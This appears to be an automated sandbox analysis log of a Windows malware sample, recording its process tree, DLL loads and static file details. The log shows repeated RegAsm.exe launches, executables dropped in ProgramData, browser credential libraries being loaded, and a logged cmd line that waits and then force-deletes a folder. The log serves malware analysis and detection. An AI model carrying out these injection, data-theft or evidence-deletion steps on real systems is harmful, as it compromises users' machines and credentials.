Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GCGHJEBGHJ.exe "C:\ProgramData\GCGHJEBGHJ.exe"
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\JKFIDGDHJE.exe "C:\ProgramData\JKFIDGDHJE.exe"
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJKFHDBKFCAA" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GCGHJEBGHJ.exe "C:\ProgramData\GCGHJEBGHJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\JKFIDGDHJE.exe "C:\ProgramData\JKFIDGDHJE.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJKFHDBKFCAA" & exit	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 5661736 > 1048576

Source: file.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x563400

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdbp source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: c:\rje\tg\\obj\Release\ojc.pdbXRVnRV `RV_CorExeMainmscoree.dll source: file.exe
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, nss3.dll.3.dr
Source:	Binary string: c:\rje\tg\\obj\Release\ojc.pdb source: file.exe
Source:	Binary string: softokn3.pdb@ source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, nss3.dll.3.dr
